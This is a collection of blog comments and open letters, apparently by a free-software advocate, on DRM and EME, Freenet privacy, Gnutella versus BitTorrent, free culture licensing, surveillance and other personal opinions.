  2. I don’t have anything against their tech. It might be brilliant and provide security for years to come, or it might just be another fad. Their way to advertise it as the solution to all the security problems is what irks me. It’s still a marker which is tied to your body, so you cannot change it in case it is copied. As such, its security properties are questionable: If it is copied once, you as person cannot use the method again until there are new sensors which cannot be fooled by copies of data from the old sensors. For its security properties you have to rely on constant improvements in the sensors -- but this offers no advantage over copied fingerprints from the android. The only advantage I can see is that you can’t steal these prints in real-life resolution by handing someone a glass water. You might now think that they actually had a point, but sadly that security property is completely irrelevant to the article on which the advertisers replied, because the article showed that fingerprints where copied in the resolution measured by the sensor. There would be no advantage at all from switching from fingerprint to #slowblood, so what they did is just bad advertising -- and sending out threats when they were called out for their bad style. 

  3. They did not spot the implication in here that the german chancellor would use their tech in 2017. I intentionally gave them that lead to turn this around in a fun way but they seem to have missed it. 

AnhangGröße
2015-08-06-chromasecurity-threatens-arnebab-for-irony-01-cropped-nogpl.png258.26 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-02-cropped-nogpl.png329.15 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-03.png13.35 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-04.png1.87 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-05.png7.89 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-06.png15.23 KB
2015-08-06-chromasecurity-threatens-arnebab-for-irony-06.png15.23 KB

Amarok - context on music - yahoo comes a tiny bit too late

There was a talk of Ian Rogers from Yahoo! who explained how labels did a hell of many horrible missteps in fighting p2p and in trying to push DRM, how Yahoo now offers a free music service, and how music software terribly lags behind the music scene. http://www.netribution.co.uk/2/content/view/1317/182/

But....

The context he talks about already exists. Just have a look at Amarok:

- Context: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1375
- Wikipedia: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1381
- Lyrics sites: http://amarok.kde.org/d/en/index.php?q=gallery&g2_itemId=1378
- and an integrated store where you don't have to buy to listen:

And all that in a free software program, so noone dictates any rules upon you.

I don't know about you, but I definitely get excited by it!

Ambition the Film: This is where magic happens

I just watched the short film Ambition from ESA, and I still have tears in my eyes.

The film is awesome. In few spots it could have profited from a tighter editing of the text (I lost suspension of disbelief twice), but overall the story is great - and what an ending!

In the making of, the simulation artist of the film Lukasz Sobisz said

“shooting myself in the foot a bit, I’m very surprised you need something like this at all now. Mankind sends a probe into space to catch a comet and land on it. And we need a great director, film and actors to convince people this is interesting.”

and I disagree with that notion: If you’re paid by the public, you should communicate your work so people can relate to it. The film succeeded spectacularly.

It is not just about interest. I had that before. It is about touching peoples hearts. A dry description alone cannot do this. But together, an idealistic project and art can reach something deep inside, inaccessible for everyday interaction. This is where magic happens.

I wish there were a german dubbed version to show my kids.

It’s been a long time since I watched something and all of a sudden felt tears rolling down my cheek. To the folks at ESA, the film crew, the editing team and the artists: Thank you.

PS: EuGH just ruled that embedding does not affect copyright. Thanks to this decision I am allowed to share the film with you.

Anonymous against trapwire - on camera??

An answer to a reddit-comment by tedemang to the article 1540 Anonymous vs. TrapWire: "We must, at all costs, shut this system down and render it useless".

Do you think, joining anonymous really helps there? That’s fleeting power, but I don’t see alternative structures being set up. This just exposes all those who want to support the cause. In front of cameras, connected to a surveillance system which records every action…

On the short term to keep secure digital communication, use freenet over your existing internet connection. If possible in darknet-mode, connecting only to your friends → freesocial.draketo.de

On the mid-term get a flourishing local community in your neighborhood, ideally with community operated internet like a meshnet - and get someone from your community elected as mayor → /r/darknetplan

And make sure you all have access to alternative media sources. Maybe provide printed copies of good blog posts to your local baker.

On the somewhat longer term, fix the democratic system, so the rich ones cannot completely rig the votes by deciding whom they give their money, so he can run for election.

On the long term, fix the economic system, so we don’t automatically get that huge imbalance in power, once the system runs without major disruption for more than 20-30 years.


Remember that what you are going up against is the very instrument the oppressive elements of our state want to use to oppress us. That instrument will monitor you, and they will try to use that data to oppress you - and to cast you in a bad light, so they can convince your neighbors that they need more cameras against those vandalizing youths (without telling them that those youths are the same ones who come over for coffee during the next summer-festival).

Australia gets mandatory data retention

Australia gets mandatory data retention — with unchecked access by roughly any local or federal police agency and “Any other agency the Attorney General publicly declares”. (So much for separation of powers)

And they can use that in court.

→ » Australia: Now is the time to go dark « ←

Dear Australians: This is what we have been talking about the past 10 years. The tech for confidential communication might still be cumbersome to use, but you now need it.

If you want to use Freenet for that, I’ll gladly help you set it up. Find me and other volunteers in the Freenet support chat.

→ » Freenet support chat « ←

If you don’t get an answer right away, just keep the browser window open: we will see your question when we read our backlogs. If you’re still in the channel when we enter, we can answer you.

Defective by Design is doing something important - actions like theirs got me to GNU/Linux

-> A reply to bashing against Defective By Design.

I was a rabid MacUser 5 years ago.

Then I learned about DRM, TPM and privacy. And I left Apple because they put in TPM chips into developer machines.

Today I'm a happy GNU/Linux user and I contribute from time to time to Gentoo, KDE and Mercurial.

(my way from Apple to GNU/Linux:
- http://bah.draketo.de/ (Broken Apple Heart in German)
- http://draketo.de/english/songs/light/broken-apple-heart (in english) )

So DBD isn't only talking to the converted. Without actions like theirs, I wouldn't be a free software user today.

They just don't reach every average Joe with a single campaign. But who could? With a few hundred people?

What they can achieve is that once an average joe gets into problems with DRM, there's a chance that he won't think “surely I made a mistake. I'll just buy the stuff again” but “weren't there people who said that Apple tries to take my freedom? Seems they were right. I won't fall for DRM again!”

And they can reach critical thinking people, who realize they should also think about their freedom when they buy a new device.

Don't completely rely on something you don't control (SaaS)

in reply to You do know you can't rely on Gmail, right?

You're citing some of the reasons why I dislike SaaS, but there's one more:

Whenever I use a SaaS application, I trust someone whom I really can't reach, and I trust him without being able to exert any kind of control.

He wants to use my data for marketing purposes? No problem - I won't ever find out, since I can't check the physical disks last accessed flag. So what about that being illegal? If I can't find out about it, why should he care? I won't ever be able to sue him.

Sure, most people are nice and law-abiding, but I prefer not to rely on everyone being honest who has access to my data on some remote server.

Sure, I can use encryption for the data I upload, but any data generated on the server will be open for the admin - regardless of the security scheme on the server, because the admin could just fake that.

So it's always back to trusting people, and I prefer not to trust others too far (nor to little).

So your company keeps its company secrets in gmail accounts? How long will it take for Google to find it, if they chance to become a competitor in the field?

If you use gmail without GnuPG encryption, you can just as well give your data directly to Google.

And the same holds true for every other SaaS solution. You can't ever trust the remote server.

It also holds true for all unfree software, by the way. You can't look inside it (or get someone else to do that), so you can't know what it does. Do you really dare to trust it?

EME in standards would mount enormous pressure on all free systems

→ comment to On EME in HTML5 by Tim Berners-Lee, taking a social angle to the problems of DRM via EME in web standards.

Dear Tim,

The previous commenters already addressed every technical comment I wanted to add. There is only one aspect I still feel missing here:

If you give EME your blessing, the social pressure on all free software communities to add proprietary blobs in their shipped browsers will rise enormously, because otherwise the proprietary developers will accuse them of not following the standard.

With that weapon in their box, I could even see copyright cartels taking to legal tools to force free software distributions to include their proprietary blobs — because following standards is seen as so important in Europe that programs can be excluded from government tenders when they do not follow specified standards. And while EME does not specify any CDM as part of the standard, that is very easy to hide in the argumentation.

Yes, that would be irony: the ones who always fought against standards suddenly using their interpretation of the standard to expunge programs which do not follow their interests.

But is it actually implausible?

Consider the pressure Microsoft put on the city of Munich to kill off the LiMux project. How much easier would this have been, if some CDMs didn’t and couldn’t run on the free system?

Please stick to the vision of the web and keep EME out of the standard. I can decide not to use an app, and every user can clearly recognize the app as not-the-web. With EME users will instead say that Linux is broken, because it does not play their internet videos. And when confronted with non-playing videos, the site owners will say "your browser does not follow the standard". That argument is in a different league than the current "we bought a non-standard third-party tool which does not support your setup".


in reality the utopian world of people voluntarily paying full price for content does not work — Tim Berners-Lee

This started to work for music once big platforms started to provide DRM-free music which was easy to pay for.

Instead of EME, the web needs a standardized way to pay for content conveniently. Then most people will pay — as they already do for music — because its much easier to simply buy the work and they have much more important things to do with their time than searching for a gratis copy which doesn’t actually give them anything extra. The only use of DRM in HTML is forcing inconvenience on all law-abiding users.

Instead of binding that much energy in a battle about preserving or destroying the freedom of the web, I’d wish the w3c would focus its efforts on a standardized, convenient way to pay.

PS: Also see the Response to Tim Berners-Lee's defeatist post about DRM in Web standards by defective by design.

How Drupal will save the world - Simplicity for beginners, complexity for experts - get in quick

Written in reply to: How Drupal will save the world.

I experienced the same with modules (having to search for hours), and I think I know at least two ways to make Drupal more accessible to newcomers.
A bit of background: I just setup my third Drupal page and I find new modules even now. The pages were of three slightly different but very similar types:

  • A newssite, needed mostly taxonomy.
  • A personal site, needed book and taxonomy, as well as themes.
  • A site for a free roleplaying system. Mostly needed book.

But even though the pages where quite different, I find myself reusing most modules.

And it took me hours to hunt them down.

To make the modules more accessible to newcomers, they should be more organized.

One way to organize them would be, to give them another sorting done by type of page I want to use them for (usecase). A blog, for example, needs different modules, than a newssite. But there will be much overlap.

Then users could simply check "I want a blog. Which modules do I need?"
Still they'd have far too many to choose from and the choice needs to be simplified for first-time users. To do that, users should be able to sort modules by popularity

Ways to sort by popularity:

  • Download-count: The number of times they were downloaded during the last month or six months.
  • Vote: Allow users to vote for modules and show the votes.

The second way to make Drupal more accessible would be to create rich compilations. That means: Don't just offer a "general drupal, search your modules by hand" download, but also some specialized precompiled versions, best with adapted config already included.

Some ideas for downloads:

  • Drupal Community Bookwriting
  • Drupal Community Newssite
  • Drupal Personal Webpresence
  • Drupal Blog
  • Drupal Webshop
  • Drupal Wiki
  • Drupal Forum
  • Drupal Rich Community Site (Forums, Community Book, Blogs, Webshop, Wiki - the full package)

These should then be the downloads a visitor first sees, to make the Drupal site a site for users.

Examples:

  • Drupal Community Bookwriting: http://1w6.org - mine, german. If you like it, I'll gladly send you the details of the setup. http://1w6.org/contact .
  • Drupal Community Newssite, if not perfect: http://gute-neuigkeiten.de - my first drupal installation.
  • Drupal Personal Webpresence: http://draketo.de - my second Drupal installation, misses Photo-Albums (since I don't yet need them) and similar to be a full fledged personal webpresence.

- All parts of the design on these sites are licensed under free licenses (one of them being the GPL). -

These two ideas still give experts the full power of Drupal, but enable newcomers to get a site running quickly.

If you like the idea, please feel free to contact me: http://1w6.org/contact

Howard-Taylor: A rising figure

A comment to The newspaper said it, so it must be true:

You already made the "I get paid for doing a free webcomic" rise, now next part is... ?

Some ideas:

  • Being paid really well
  • Having Sandra be paid really well, too
  • Having a Schlock foundation which pays you for the online comic directly
  • Getting a six figures income from Schlock
  • Having the Schlock foundation grow enough that it becomes the Taylor Webcomic fund which pays webcomic authors all over the world
  • Founding a team of Space Mercenaries and writing the comic about your actual adventures as Schlock sidekick
  • Really having someone do the research so the Schlockers can beat NASA to Mars
  • Learning the trick to living long enough to go on inking where no one has inked before
  • Founding the Schlock colony fund which pays people to leave earth, meet interesting live forms and take over their planets :)
  • Finally taking a strange scientist on board who starts the biggest intergalactic war by revolutionarizing galactic transportation.
  • And at last, building a time machine and going back in time to be a webcartoonist again :)

I hope French Filesharers turn to Freenet

→ Comment to France Starts Reporting ‘Millions’ of File-Sharers by Torrent Freak.

I hope they all turn to freenet. There’s scance chance of getting many user-addresses there, and it can provide a service similar to torrents and decentral tracker in one, but anonymously and safe from censorship.

http://freenetproject.org

I’ve been running it for years now, and it got better and more secure every year.

The really paranoid can use it in darknet-mode: Only connect to people they know personally. Then it gets really hard to find out that you use freenet.

But even in Opennet, it’s extremely hard to find out what you share or download. Freenet is built for the needs of dissidents in repressive regimes and to avoid any kind of censorship, so it delivers sufficient privacy and anonymity for filesharers.

A word of warning, though: Compared to well-seeded torrents, freenet is slow. That’s the price of anonymity and privacy. But nowadays it’s fast enough for fansubbed anime and beats many weakly seeded torrents :)

Maybe then the media companies will learn that the way to make money with entertainmant is to make it good and personal enough that people want to give them money to make sure they keep producing more great stuff. They could learn from Howard Taylor and Schlock Mercenary.

If you do what you love doing, it becomes what you are good at

comment to You’re Not Meant To Do What You Love. You’re Meant To Do What You’re Good At. by Brianna Wiest, who arguments that the skills of people are "a blueprint of their destiny". For support she describes experience with people who try to do something they do not actually enjoy doing.

This whole argument sits on the assumption that skills develop somehow on their own.

Skills develop, because you use them. So if you do what you love doing (note the nuance!), then — except in rare cases — this becomes what you are good at.

And the real joy from daily work is in how it fulfils the values we value. What we value differs between people. For some it is money, for some it is respect and for some it is following the paths they chose themselves.

In addition we live in a society where less and less people are needed for the tasks which actually have to be done — Food. Shelter. Health. Education.  — because productivity rises by 2% every year. That means it is doubling every 35 years, so with every generation we need 50% less people in the tasks which have to be done. But new tasks are found which help society and if many people pursue their passions, it is more likely that some people already have the required training when a given skill turns out to be very helpful to society.

The article takes a mistake — people trying to do something they want to have done but what they don’t actually love to do — and then uses this as basis for an argument that people should only do what they are good at. Which is not related to the problem described. It uses flawed reasoning to argument for something very problematic.

A society in which all people have to do only what they are good at is one without personal choice. It is an inhumane dystopia.

Consider the endgame: Your skills are measured at the age of 5. Then you get to learn what you are good at. And later do that.

And yes, with all-encompassing, constant and retroactive external evaluation of every choice in life we are moving there. It’s why people are so obsessed with their CVs these days, while 30 years ago many more followed their passions, regardless of what society thought.

You cannot expect to earn money with something you are not good at. But as a society we need to give people the space to experiment with things they are not yet good at to make it more likely that there are people who have the skills needed for the niches which open tomorrow. Otherwise we will have to pay far more people for doing something they are not good at, because no one will ever have developed the necessary skills.

The only skill you can be good at without doing what you love is a skill which someone else chose for you.

You can train to become really, really good in almost anything you decide to do.

Should you do what you’re good at, or rather do what you love? Should you use your talents or follow your passion?

To answer this question, let’s look at actual research instead of gut feeling.1 Is a talent how good you are at doing something? Then it is a function of training time. Is it how fast you move forward? Then you likely already learned from other tasks many of the things you need for your task at hand.

If you’re not competing in top sports or pitting your skills against others every day in objectively measurable competitions where the winner takes it all (so you would have to be the best to earn anything), you can learn to be really good at most everything, if you put your mind to it. But you have to put your mind to it and train. Research showed that even the level of skill that top athletes and musicians possess is a direct function of the amount of training they put in (on logarithmic scale: double the training to become better by one measurable unit).

That’s why I consider telling people to follow their talents instead of their passion to be cynical, though disguised as trying to help people find happiness. To paraphrase: “You are born with fixed talents. Your only choice in life is to use these or to be unhappy.” This isn’t just patronizing and invalidates the very idea of free will. It is also wrong.

The more realistic (and positive) guideline is to do what you love doing, and to work towards becoming great in what you love doing. Which is not the same as doing what you would love to have done: the hero is not the one who loves standing on the tribune but the one who loves doing what’s right despite hindrances. Training is hard, but if you make it a habit, it can become natural:

»The shift from deliberate to natural is powerful and transformational.«
— Thomas Oppong in To Get More Creative, Become Less Judgemental

You can learn to become really, really good in almost anything you decide to do. It’s unlikely that you’ll become world champion if you start into a new skill at the age of 40, but you can come pretty close to the champions with a tenth of the training they put in. If you always did what (others said) you were good at till the age of 40, you still have a choice: When you reach 50 you can be very good at something you chose, or world class at something others chose for you.

But keep in mind that you’ll still need something to eat. If that what you love doing cannot keep you and your family fed, then you will have to settle for something less — for example using what you’re already good at in such a way that you love doing it and finding joy in some aspects of what you do. Those who told you what to do might have had good reason for that (but then, they might still have been wrong).

(also see The 4 things it takes to be an expert or the book Thinking Fast and Slow from Kahnemann)


  1. The Role of Deliberate Practice in the Acquisition of Expert Performance, K. Anders Ericsson, Ralf Th. Krampe, and Clemens Tesch-Romer, Psychological Review, 1993 

KDE and Gnome vs...

I'm a KDE user and quite excited about KDE 4, but I think the progress of Gnome is very promising, too.

Gnome and KDE both innovate, and both push limits, and both will learn from each other.

KDE learns from Gnome and uses the Telepathy definition.

Gnome learns from KDE and switches to WebKit which originates from khtml.

Both work together under the hood of freedesktop.org

And both are moving ever faster to replace proprietary systems.

So hey, I might be a KDE user and I might care most about KDE, but Gnome and KDE are both important, because being two projects they can move in different ways, find together again and move out again and that way cover far more ground than a single project could.

I want many people to use KDE and Gnome users want many people to use Gnome.

Lets move out, then, and create guides for our users and create many great things which bring them to the respective desktop, and while we try to create a better experience than the other free desktops, we might suddenly see, that we just surpassed any non-free desktop together.

Then we can sit down, celebrate a big free software party and begin outpacing the respective other one again.

And while doing so, we can still keep contact, share ideas and work together, and we will make a difference.
- written at: http://blogs.gnome.org/desrt/2007/08/07/im-excited-about-the-future-of-g...

Killing the head of a terrorist organization doesn’t stop it

→ A comment to The Effectiveness of Political Assassinations.

Another answer why this doesn’t work is really simple: Consider that you were in a terrorist organization. You work with people in secrecy, but the ones you know are close to you, because they know your most intimate secrets.

Short: You fight alongside friends (though probably assholes by most ethical standards).

Now someone kills one of your friends.

He is shown around in the media and people say how evil he was.

Now imagine not wanting revenge. Quite hard, isn’t it? A religious or power-play argument just got personal.

If it helps, imagine that the one who got killed was your father, sister or beloved one.

If it’s still hard to imagine why killing a leader is counterproductive, try to imagine that someone raped and killed your 14 year old daughter. Then he got celebrated in the media as hero. Would you manage to not start a personal war against him but to calmly go to a lawyer and accept to hear that your daughter incited him to his acts by dressing like a whore?

If this sounds unrelated: It’s the same emotional reaction, just pulled into our own cultural context. Terrorists believe that they fight for a just cause (at least if they aren’t only in it for the money). So any killing just strengthens their will to fight all out.

The only reason why killing a leader could stop the group is that the leader may be the only one whom all inside the group know and who can coordinate it. But naturally he has lieutnants who also know all, and if one of those dies, he gets replaced.

So please fight terrorism in way which works: Making sure that terrorists have no support in the general population. This naturally means that you must not be openly hostile to them.

Ask first “Why do they hate us?”, and then try to change that.

Last.fm royalties, question about free music

Written at: http://musicmanager.last.fm/contact/

Hi,

I licensed all my works under free and open licenses which permit any kind of commercial copying and reuse, but which don't permit taking away rights from the listeners.

I'd like to upload the files to last.fm, but I can only do so, if I can be sure, that no additional restrictions will be placed on the users (no DRM). Else I would violate the license agreement.

These are the terms under which I work together with other artists, so there's no way around that.

I can upload the files, but I need to know that all users will retain the following rights to my files:

  • Free use for any purpose (any way they retrieve it. Paying for getting is OK)
  • Free modification
  • Free passing on or selling while giving other users the same rights.
  • Free passing on or selling of modified works while giving other users the same rights.

Are these rights safe with you?

Best wishes,
Arne


Answer: no.

LimeWire Interview - badmouthing their own technology

Comment to the LimeWire-Interview on Slyck.

Their words, my comments (from three years of reading in and discussing on the Gnutella Development Forum (GDF):

"Gnutella has had a 2 GB file size limit, while BitTorrent excels at delivering truly enormous files."

-> That's just blabber, but it now explains, why LW wasn't that quick in closing the 2GB limit, even though the way to do it has been around for more than two years (and was posted to the Gnutella Development Forum where Gnutella developers discuss).

There is no underlying technological hurdle for sharing files with a size of more than 2GB, except for the one which LimeWire doesn't want to fix so that they can use it as an excuse to include BitTorrent.

Also Gnutella already does completely decentral swarming, and does it since more than two years ago.

The only real advantage of BitTorrent is, that it has torrent-sites where users meet and comment, but you can do the same for Gnutella (for example like http://freebase.be ).

And that the other p2p-clients don't have it.

"A Gnutella program connects to peers randomly, and broadcasts searches into its neighborhood. It can't find a file outside this neighborhood. Enter the Mojito DHT, a revolutionary new technology we've developed for LimeWire. In a distributed hash table like Mojito, the peers don't connect randomly--they organize themselves into a navigable tree. Imagine one computer has the only copy of a rare file, and another on the far side of the network wants it. With Mojito, they'll be able to find each other."

-> Except that this neighborhood is about 400,000 computers and there've been plans for years to extend it to 1 Million while reducing network traffic.

The only thing which hindered that is, that LimeWire didn't manage to get their program keep 100 connections without too much impact on performance.

And with the performance of Gnutella (traffic of only 7kB/s up and down for a fully connected ultrapeer, less then 1kB/s for a Leaf) increasing the network size wouldn't have created many problems.

-> A bit deeper: http://draketo.de/english/p2p/light/why-gnutella-scales-quite-well - if you like it, please digg it...

Still, Mojito will be a great complement to Gnutella, because it can be used to search for files and hosts _by hash_. If you want _exactly that file_, then you use mojito (aka Kademlia) and a hash string. If you want to search by keyword or tag, then you use Gnutella.

And it will help LimeWire, because other Gnutella clients won't have it at once, so they will be in front. Gnutella is an open protocol, so they need to look at all times like they are front row, else some other Gnutella client will take over their users.

I don't know, why they badmouth their own technology, but as you've seen I have some suspicions.

On Forums and trolls

written in the Phex Forum.

"Let them walk against a hill of politeness, and then let them slide off. Have a ban-request as forcepunch somewhere near, if they try to break the hill despite explicitely having been warned."

I try to avoid giving them a chance to justify growing angry. If they shout despite having no justification, and if they don't stop after being asked to disable their capslock (always assume the best), I try to just warn them that they'll be banned if they go on (never had to - and there was just one case where I decided to ignore a provocation instead - see our Polar Skulk forum) and just request a ban, if they don't stop.

Every post in any forum in here (not just Phex) will be read by other people, and if the tone of the posts grows too angry, angry people and trolls will flock here, because they see that provocation makes someone angry in here.

And I know, that trolls come anyway, but a hill of calmness seems to me like the best way to reduce the number of those who actually post.

And my mood is much better, when I read my own calm posts than when I read a post where I let my temper flare up.
- Arne Babenhauserheide

One Guide to rule them all,
One Guide to find them,
One Guide to reach them all
and into calmness bind them.

On keeping emotions in check

-> An answer to a distro battle at linuxhumor. This is an example of a text which was hard for me to write in a calm tone. I think I mostly succeeded, but parts of the emotions on both sides still bleed through… take it as an example, how hard it is to stay calm in a heated situation - and how important.

Please keep your own language in check, and don't pull Stallman in here, when he isn't needed. He's got more important things to do than helping your argumentation.

If you look at what I wrote, you'll see I did never say "Your distro is bad" or anything similar.

I just said: "Your advertising is a good deal too blunt."

Why do you answer to other people who say things intended to offend you?

Or to put it differently: Why didn't you react to my post with backup information, why Ultumix is good and where it helps to convert people, cutting out the advertising language so it can be read as information?

I see that you're pissed off by Ubuntu (I don't like the "one distro to find them, one distro to ..." mindset (you told about) either, but I doubt that all Ubuntu people have it. I'm not active in Ubuntu, so I don't know much about the internals (I don't even know what LoCo means - I assume Local Coordinators or so), I just installed it for my wife, because my Gentoo might be a bit too much for her (this changed in the meantime. She now has a Gentoo, too :) )).

You're pissed off, and that's OK. I think if I had walked your way, I might be pissed, too. But it doesn't help you spread your Distro to other people.

Get a grip on your emotions - get a sandbag and hit it when you're just a bit too pissed (I do that from time to time, and unless you tested it yourself, it might be hard for you to see how very good it feels to just let out the anger at that 15kg sandbag). But stop, before your knuckles bleed :)

We are writing here, so it is possible to just sit back and have a break, which makes it easier to get a grip on oneself. At the same time we're just reading what others say, which makes it easier to misinterpret what others say, so keeping our own emotions in check (or letting them out where they don't hurt anyone but your knuckles) gets more important.

And I know I sound like a pseudo-wise great grandfather now. That isn't intentional. I'm learning my way in life myself, and I might just be wrong about it (and also about anything else I think I know), but I write it anyway, because I made some errors myself, and I want to help others not to walk into the same trap. And if what I see right now is only a necessary transition to even better ways to live, then I can at least help others reach that transition with less hardship than I had.

Open Letter to Julia Hilden on her article about pay-per-use

I just read your article on per use payments.

I think there are two serious flaws in per use payments:

(a) Good works of art need to last

As you stated correctly, I define myself partly through the media I "consume".

This does mean, that I want to have the assurance, that I can watch a great movie again a few years in the future.

Imagine this scenario:

  • I found a really great book, read it and got entranced.
  • It's 20 years later, now. and I want to read the book to my children.
  • Suddenly I realize, that I'd have to pay for it again to be able to read it, but it's no longer available, because the company I bought it from on a per use basis died 10 years ago, and no one took over, because the management of the book became too costly to be paid for by the few people who still wanted to read the book in that year.

(b) Technical realization

For per use payment, someone must monitor, how often I use a work of art, and that means, someone must have data on my behaviour, which isn't in the least compatible with personal data protection.

Also, to enable per use payments, you need DRM: Digital Rights Management, which needs to be spelled "Digital Restrictions Management" to account for its effect on end-users, because it restricts me from looking a second time at a file which I already have on my computer.

Without DRM you can't control my use of a document I downloaded to my computer, because it is on my territory which only I control.

With DRM the control of my computer switches to the manufacturer of the DRM, who restricts my useage and only allows me certain actions.

Naturally the DRM-master is then able to monitor and control my use of digital works, but the price for this is giving my personal domain into the hands of someone who isn't necessarily trustworthy (or would you trust microsoft with your new anti-microsoft book, just to name an example?).

There's a quite nice read on the dangers of going through with your proposal on the web, and the prospect is even smaller than yours - it's only about keeping people from passing on books (for which you also need DRM), but it shows what will likely happen, when you the technics for realizing your idea are deployed:
Right to Read

And there is another one. Since your scheme needs DRM to enforce per use payment, this one might also be interesting to you: Can you trust your computer?
Can You Trust

(and please keep in mind that even today a physics book costs up to 150€, even though it costs far less than that to produce it and students don't have much money, so pay per read wouldn't magically lower prices).

So, while pay per use sounds nice and fair from a distance, it grows into a maze of trouble when you take a closer look.

Best wishes,
Arne Babenhauserheide

Organize!

Organize! … That’s the thing that has a chance of preventing all of this, and of saving the most lives when that fails. — Yonatan Zunger

I’m not sure it is a good idea to reply to this article. I am doing it anyway, because it’s already on record that I read this article. Likely even at what pace I read it.

Thank you for this article, Yonatan Zunger. This is frightening, but in an important way. And organized well enough that the essential ideas stick. Important ideas.

With images of cute animals. Added with reason.

What “Things Going Wrong” Can Look Like

Reading deeply recommended.

Powers that be - money concentration vs. democracy

-> written in reply to Bogus Copyright Claim Silences Yet Another Larry Lessig YouTube Presentation on techdirt.

This shows painfully how power is shifting currently:

  • <5% of the people have >90% of the resources.
  • So the <5% have more influence on the media.
  • The media influences which people are elected into positions of power.
  • Then these elected pass laws which shift more resources and power towards the <5%.

So the simple root of the problem is that money gets concentrated on a few people, and any self-respecting (intelligent) democracy would have to make sure that money can't accmulate too much like that.1

But guess who doesn't want laws which prevent or revert overboarding money concentration.

This is a conflict which a democracy cannot avoid. It checks whether a given democratic system can stand the test of time.


  1. You can find a deeper discussion of the problems money concentration causes for democracy in a German article on this site

Richard M. Stallman stands for Free Software

→ a comment to 10 Hackers Who Made History by Gizmodo.

As DDevine says, Richard Stallman is no proponent of Open Source, but of Free Software. Open Source was forked from the Free Software movement to the great displeasure of Stallman.

He really does not like the term Open Source, because that implies that it is only about being able to read the sources.

Different from that, Free Software is about the freedom to be in control of the programs one uses, and to change them.

More exactly it defines 4 Freedoms:

  • (0) The freedom to run the program in any way you want (compare this with Windows, which does not let me start it in a virtual machine, because “the hardware changed”).

  • (1) The freedom to access the source and change the program (compare this to Starcraft 2 which I can’t use in a LAN-party without having everyone connected to the internet).

  • (2) The freedom to copy it and give it to others (compare that to all these iApps, which I can’t even backup easily for my own use).

  • (3) The freedom to distribute my changed versions.

This is Free Software as defined by the free software movement which was initiated by Richard Stallman and which made successes like Google possible by giving them a stepping stone to build upon: Free Software users stand on the shoulders of giants.

Open Source on the other hand is often being used as name for products which don’t even fullfill freedom (1) completely. That’s why the GNU project did not take part in the first Google Summer of Code: Google required contributors to say that they work on Open Source. In the second Summer of code that was changed, so projects can now correctly identify themselves as Free Software Projects, and GNU has been taking part in the Google Summer of Code since then.

PS: But still it’s great to see Stallman in this list!

Swarming, Torrent and Gnutella

In Reply to:
http://www.computeractive.co.uk/personal-computer-world/features/2193584...

Hi,

I just wanted to add, that swarming is included in Gnutella since 2003 or something, and that it already achieved everything back then that the "new trackerless torrents" achieve today.

If you want easy to read information which doesn't need a coder to understand it, just have a look at Gnutella For Users: A guide to the changes in Gnutella for non-programmers.

http://gnufu.net

The Four Freedoms of Free Culture: Avoid Cultural Slavery

→ comment to The Four Freedoms of Free Culture on QuestionCopyright.org.

Thank you for spreading the thought of freedom in culture!

I currently don’t use creativecommons licenses on my site, because they have no source protection (you can’t exercise your right of modifying, if the work is hidden inside some non-source container, like autoscrolling flash).

Update: I changed this in 2015 when cc by-sa became one-way compatible with GPLv3. Now I also allow cc by-sa for text.

Instead I use the GPLv3, for my site (draketo.delicensing) as well as for a free roleplaying book I write (1w6.org — german).

My reason for using free licenses in all my hobby work is simple: When a cultural work becomes part of my life, any restriction on using that work takes away a part of my personal freedom.

That’s why freedom is essential for all cultural works that matter.

Becoming part of my life means that I identify with it, that it means something to me. If there’s a really cool song I listen to all day, then it becomes part of my life.

If I then can’t change and share it, when my tastes change, that part of my life is locked and my freedom taken away. Works which don’t mean something to me can’t take much of my freedom away. But if a cultural work means something to someone out there — to anyone — then it has to be free to avoid stealing that one fans freedom.

So any unfree cultural work is either useless (doesn’t mean anything to anyone) or it’s a tool for cultural slavery (stealing our freedom).1

And I think Stallman is simply afraid. In Software he has the confidence that his work will be improved by others. In culture he doesn’t. I think that’s part of his life, and the only way to change that is to show that free culture is a success for political movements, too.

It’s hard to allow your child to spread its wings and fly on its own, and I think that for him, his manifests which spawned the free software movement are his children.


  1. At the same time, though, a cultural work which doesn’t get written doesn’t have the potential to help people progress. So if an unfree work helps people throw off other shackles, then the net gain for freedom might be positive. Just always keep in mind, that being unfree has a cost for every user of the work – which includes all your fans. If your work is unfree, it is worth less than if it were free licensed. 

Unwanted pregnancy hits at random

If you do not want to have a child right now, but you want to have a fulfilled heterosexual sex-life, pregnancy is a risk which can hit anyone, however careful he or she is to avoid it. This is an answer I gave someone who equated unintentional pregnancy with questionable morals.

According to "How effective are condoms against pregnancy?":

If you use condoms perfectly every single time you have sex, they’re 98% effective at preventing pregnancy. But people aren’t perfect, so in real life condoms are about 82% effective — that means about 18 out of 100 people who use condoms as their only birth control method will get pregnant each year.

Other means of birth control are around 70-91% effective, with the sole exception of the implant which has 99% effectiveness, so even if people are perfectly hygienic and careful, there will be many pregnancies: if you are perfectly hygienic and careful for 10 years, there will be around one pregnancy per couple (on average).

Even with the implant or perfectly used condoms you’ll have 1-2 pregnancies for every 10 couples within 10 years.

That means calling people unhygienic or careless who get pregnant or whose partner gets pregnant is false argumentation.

Reality is: A pregnancy is an always present risk if a man and a woman have sex, whatever you do to prevent that. Getting pregnant when you did not want to get pregnant is bad luck. You can be careful, but you cannot rule it out completely.

There is however an actually questionable moral code, but not the one of people who get pregnant unintentionally. The questionable code is the moral code of those who condemn people who got pregnant; the code of those who wrongly equate being hit by chance with moral inferiority.

If you find yourself condemning people for things which can happen to almost everyone, please look at the actual situation and reconsider that stance. You are not your moral code. If you find it to be wrong, you can change it, and you will find that you stay yourself and even become more rooted in your own self, because you then choose for yourself how you want to be.

People who decide whether they want to have a child should have the right to take that decision without interference from moral accusations. Their decision is an important one, so they need to be able to think clearly to find the best way forward. Moral accusations cloud the mind of both the accuser and the accused.

When you're happy with a free project, write a thank you!

From the Gentoo Forums:

I agree that spreading a positive 
message is good, but I've always 
been nervous to send thank you 
notes out to people I've never 
met.  
Worse, I don't want to potentially 
overload an inbox with a mes-
sage that isn't going to help all 
that much. Hopefully it would be 
received in a positve way. 

I try to remember to send "thank you"s from time to time.

